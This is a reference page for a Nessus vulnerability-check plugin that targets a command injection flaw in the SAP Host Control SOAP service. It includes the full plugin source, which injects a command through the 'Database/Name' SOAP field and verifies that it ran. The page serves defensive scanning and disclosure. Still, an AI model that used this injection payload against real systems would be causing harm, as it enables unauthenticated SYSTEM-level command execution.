SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) - Nessus

Critical   Plugin ID: 62293

This page contains detailed information about the SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 62293
Name: SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333)
Filename: sap_host_control_note1341333.nasl
Vulnerability Published: 2012-08-05
This Plugin Published: 2012-09-25
Last Modification Time: 2021-01-19
Plugin Version: 1.8
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: os_fingerprint.nasl, sap_control_detect.nasl, sap_host_control_detect.nasl
Required KB Items [?]: www/sap_control, www/sap_host_control

Vulnerability Information

Severity: Critical
Vulnerability Published: 2012-08-05
Patch Published: 2012-05-01
CVE [?]: N/A
CPE [?]: cpe:/a:sap:netweaver

Synopsis

The remote web server hosts a SOAP service that can be abused to execute arbitrary commands.

Description

The version of SAP Host Control, offered by 'sapstartsrv.exe', fails to sanitize user input to the 'Database/Name' parameter when calling the 'GetDatabaseStatus' SOAP method. A remote, unauthenticated attacker may use this to run commands that, by default, run as SYSTEM.

Note that while this vulnerability affects all platforms, Nessus can only detect vulnerable instances running on Windows.

Nessus has not removed the global environment variable that it created. This plugin will not report this host as vulnerable again until the 'MACHINE' key has been deleted from the registry at :

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment

Solution

Apply the patch referenced in the vendor's advisory.

Public Exploits

Target Network Port(s): N/A
Target Asset(s): N/A
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) vulnerability:

  1. Metasploit: exploit/windows/http/sap_host_control_cmd_exec
    [SAP NetWeaver HostControl Command Injection]
  2. Exploit-DB: exploits/windows/remote/20944.rb
    [EDB-20944: SAP NetWeaver HostControl - Command Injection (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score:10.0 (High)
Impact Subscore:10.0
Exploitability Subscore:10.0
CVSS Temporal Score:8.3 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.3 (High)

Go back to menu.

Plugin Source

This is the sap_host_control_note1341333.nasl nessus plugin source code. This script is Copyright (C) 2012-2021 Tenable Network Security, Inc. 

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(62293);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_bugtraq_id(55084);
  script_xref(name:"EDB-ID", value:"20944");

  script_name(english:"SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333)");
  script_summary(english:"Attempts to set a global environment variable");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a SOAP service that can be abused to
execute arbitrary commands.");
  script_set_attribute(attribute:"description", value:
"The version of SAP Host Control, offered by 'sapstartsrv.exe', fails to
sanitize user input to the 'Database/Name' parameter when calling the
'GetDatabaseStatus' SOAP method.  A remote, unauthenticated attacker may
use this to run commands that, by default, run as SYSTEM.

Note that while this vulnerability affects all platforms, Nessus can
only detect vulnerable instances running on Windows.

Nessus has not removed the global environment variable that it created.
This plugin will not report this host as vulnerable again until the
'MACHINE' key has been deleted from the registry at :

  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment");
  script_set_attribute(attribute:"see_also", value:"https://service.sap.com/sap/support/notes/1341333");
  script_set_attribute(attribute:"see_also", value:"http://www.contextis.com/research/blog/sap4/");
  script_set_attribute(attribute:"solution", value:"Apply the patch referenced in the vendor's advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'SAP NetWeaver HostControl Command Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/05/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/09/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:sap:netweaver");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.");

  script_dependencies("os_fingerprint.nasl", "sap_control_detect.nasl", "sap_host_control_detect.nasl");
  script_require_keys("www/sap_control", "www/sap_host_control");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("webapp_func.inc");

function www_ports()
{
  local_var fields, i, ports;

  ports = get_kb_list("www/*/" + _FCT_ANON_ARGS[0]);
  if (!isnull(ports))
   ports = keys(ports);

  if (isnull(ports) || max_index(ports) <= 0)
    exit(1, "No ports.");

  for (i = 0; i < max_index(ports); i++)
  {
    fields = split(ports[i], sep:"/", keep:FALSE);
    ports[i] = int(fields[1]);
  }

  return ports;
}

function soap(cmd, port, type)
{
  local_var xml;

  if (type == "Host Control")
  {
    xml =
      '<?xml version="1.0" encoding="UTF-8"?>
       <SOAP-ENV:Envelope
         xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xmlns:xs="http://www.w3.org/2001/XMLSchema">
         <SOAP-ENV:Body>
           <ns1:GetDatabaseStatus xmlns:ns1="urn:SAPHostControl">
             <aArguments>
               <item>
                 <mKey>Database/Type</mKey>
                 <mValue>ada</mValue>
               </item>
               <item>
                 <mKey>Database/Password</mKey>
                 <mValue>password</mValue>
               </item>
               <item>
                 <mKey>Database/Username</mKey>
                 <mValue>control</mValue>
               </item>
               <item>
                 <mKey>Database/Name</mKey>
                 <mValue>NSP ' + cmd + '</mValue>
               </item>
             </aArguments>
           </ns1:GetDatabaseStatus>
         </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>';
  }
  else
  {
    xml =
      '<?xml version="1.0" encoding="UTF-8"?>
       <SOAP-ENV:Envelope
         xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
         xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xmlns:xsd="http://www.w3.org/2001/XMLSchema"
         xmlns:SAPControl="urn:SAPControl"
         xmlns:SAPCCMS="urn:SAPCCMS"
         xmlns:SAPHostControl="urn:SAPHostControl"
         xmlns:SAPOscol="urn:SAPOscol"
         xmlns:SAPDSR="urn:SAPDSR">
         <SOAP-ENV:Body>
           <SAPControl:GetEnvironment />
         </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>';
  }

  return http_send_recv3(
    port         : port,
    method       : "POST",
    item         : "/",
    add_headers  : make_array("SOAPAction", '""'),
    data         : xml,
    exit_on_fail : TRUE
  );
}

app = "SAP Host Control";

# This is a blind command injection, and we can only see the results
# on Windows.
os = get_kb_item_or_exit("Host/OS");
if (os && "Windows" >!< os)
  audit(AUDIT_OS_NOT, "Windows");

# Get details of the SAP ports.
ports_hc = www_ports("sap_host_control");
ports_c = www_ports("sap_control");

# We want to try and exploit each Host Control port, and then try to
# confirm on any Control port, so branch.
port_hc = branch(ports_hc);
url = build_url(port:port_hc, qs:"/");

# There are a few restrictions on the command we send:
#
# 1) It must be a maximum of 31 bytes.
# 2) It must not contain any spaces.
# 3) It must not contain any double quotes.
cmd = "setx/?|findstr/c:COMPAQ|cmd";

# The exploit above will execute a section of the command's help page,
# setting the following global environment variable.
env = "MACHINE=COMPAQ COMPUTER";

# We need some names for our exploit. The filename has to be short.
file = unixtime() + ".txt";
host = "localhost";

# Put together regexes to match the SOAP responses we hope for.
re_hc = "<faultstring>Generic error.[^<]*</faultstring>";
re_c1 = "<SAPControl:GetEnvironmentResponse><env>.*</env></SAPControl:GetEnvironmentResponse>";
re_c2 = "<item>" + env + "</item>";

# Narrow down the list of Control ports to ones that we can get the
# environment from. If the environment variable is already set, then
# we can't perform the exploit and know if it worked.
ports_env = make_list();
foreach port (ports_c)
{
  res = soap(port:port, type:"Control");
  if (res[2] !~ re_c1)
    continue;

  if (res[2] =~ re_c2)
    exit(1, "The global environment variable, 'MACHINE', created by this exploit already exists.");

  ports_env = make_list(ports_env, port);
}

if (max_index(ports_env) <= 0)
  exit(1, "All SAP Control ports rejected our 'GetEnvironment' SOAP request.");

# Perform the exploit.
rounds = make_list(
  # Try to log in to the database, making sure the error message ends
  # up in file we chose.
  '-o ' + file + ' -n ' + host + '\n!' + cmd + '\n',

  # Provide the error log as a file of commands for the database.
  '-ic ' + file
);

reqs = make_list();
foreach round (rounds)
{
  res = soap(port:port_hc, type:"Host Control", cmd:round);
  if (res[2] !~ re_hc)
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

  reqs = make_list(reqs, http_last_sent_request());
}

# Try to find a Control port, from the previously vetted list, that
# now has the global environment variable set.
found = FALSE;
foreach port (ports_env)
{
  res = soap(port:port, type:"Control");
  if (res[2] !~ re_c1)
    continue;

  if (res[2] =~ re_c2)
  {
    found = TRUE;
    reqs = make_list(reqs, http_last_sent_request());
    break;
  }
}

if (!found)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

# Report our findings.
report = NULL;
if (report_verbosity > 0)
{
  report =
    '\nNessus was able to perform command injection through the SAP Host' +
    '\nControl SOAP web service. The command executed was :' +
    '\n' +
    '\n  ' + cmd +
    '\n';
}

security_hole(port:port_hc, extra:report);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/sap_host_control_note1341333.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\sap_host_control_note1341333.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/sap_host_control_note1341333.nasl

Go back to menu.

How to Run

Here is how to run the SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) plugin ID 62293.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl sap_host_control_note1341333.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a sap_host_control_note1341333.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - sap_host_control_note1341333.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state sap_host_control_note1341333.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 72258 - SAP Host Agent SOAP Web Service Information Disclosure (SAP Note 1816536)
  • 146272 - SAP BusinessObjects Business Intelligence Platform SSRF Vulnerability (direct check)
  • 40617 - SAP SAPgui MDrmSap ActiveX (mdrmsap.dll) Buffer Overflow
  • 32194 - SAP MaxDB Multiple Vulnerabilities
  • 148400 - SAP NetWeaver AS Java Monitoring Directory Traversal (2234971)
  • 138506 - SAP NetWeaver AS Java Multiple Vulnerabilities
  • 139583 - SAP NetWeaver AS Java DoS (2941315)
  • 150787 - SAP NetWeaver AS JAVA Information Disclosure (3023299)
  • 150717 - SAP NetWeaver AS ABAP XSS (June 2021)
  • 151762 - SAP NetWeaver AS ABAP and ABAP Information Disclosure (3044754)
  • 150718 - SAP NetWeaver AS JAVA Missing XML Validation (3053066)
  • 157848 - SAP NetWeaver AS Desynchronization (ICMAD)
  • 145705 - SAP NetWeaver AS Java and AS ABAP Multiple Vulnerabilities (Jan 2021)
  • 154918 - SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)
  • 138762 - SAP NetWeaver : Authentication Bypass (CVE-2020-6287) (Direct Check)
  • 36073 - SAP GUI Moniker Creation Multiple Vulnerabilities
  • 145532 - SAP Solution Manager Missing Authentication (2890213)
  • 22309 - SAP DB / MaxDB WebDBM Client Database Name Remote Overflow
  • 25681 - SAP DB / MaxDB Web Server DBM_INTERN_TEST Event Buffer Overflow
  • 29924 - SAP DB / MaxDB Cons Program Arbitrary Command Execution
  • 36163 - SAP GUI KWEdit ActiveX Control SaveDocumentAs() Insecure Method

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file sap_host_control_note1341333.nasl version 1.8. For more plugins, visit the Nessus Plugin Library.

Go back to menu.